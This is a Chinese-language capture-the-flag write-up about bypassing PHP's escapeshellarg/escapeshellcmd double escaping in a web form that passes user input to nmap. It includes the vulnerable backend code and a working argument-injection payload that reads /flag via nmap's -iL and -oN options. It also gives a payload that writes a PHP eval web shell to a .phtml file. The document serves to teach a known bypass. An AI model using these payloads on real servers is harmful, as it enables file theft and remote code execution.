经典回显关了的NMAP,和之前做过的一台hack the box靶机里面的某一台比较像
那么就是合理利用 -oN的问题了,直接输出flag就可以,但是你一定要连shell也无所谓,多一步连接工作罢了
127.0.0.1 正常回显,-iL代表查找目标主机中的相关文件
下面就是尝试它如何过滤的
直接输出到flag payload:127.0.0.1' -iL /flag -oN flag '
怎么说呢,我们在127.0.0.1 | ls的时候他把我们的|转义了,那么肯定是有过滤机制的
其中这两个单引号是用来绕过后端过滤机制的,也是为了去构造命令执行的。连shell确定后,后端用了经典的escapeshellarg和escapeshellcmd双过滤机制
在不确定的时候只能盲猜,这也就是套路了,看看后端具体代码
set_time_limit(0);
if (isset($_POST['host'])):
if (!defined('WEB_SCANS')) {
die('Web scans disabled');
}
$host = $_POST['host'];
if(stripos($host,'php')!==false){
die("Hacker...");
}
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$filename = substr(md5(time() . rand(1, 10)), 0, 5);
$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);
if (is_null($result_scan)) {
die('Something went wrong');
} else {
header('Location: result.php?f=' . $filename);
}
nmap_args和result_path在settings.php里不是很重要,我们要关注的还是这一句
$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
可以看到我们可控的只有$host,假设我们传入的是127.0.0.1’ -iL /flag -oN flag ’
经过escapeshellarg处理,
'127.0.0.1'\'' -iL /flag -oN flag '\'''
经过escapeshellcmd处理
'127.0.0.1'\\'' -iL /flag -oN flag '\\'''
具体看这个:http://www.lmxspace.com/2018/07/16/%E8%B0%88%E8%B0%88escapeshellarg%E5%8F%82%E6%95%B0%E7%BB%95%E8%BF%87%E5%92%8C%E6%B3%A8%E5%85%A5%E7%9A%84%E9%97%AE%E9%A2%98/
我们的payload被处理之后被拼接成了
nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/9b661 -iL /flag -oN flag 127.0.0.1\ \\
直接访问/flag就好了,当然这题是纯靠运气成分的,或者说是做题经验?
传shell的payload:127.0.0.1' <?= @eval($_POST["hack2"]);?> -oG hack2.phtml '
参考视频链接:https://www.bilibili.com/video/BV1C44y177th/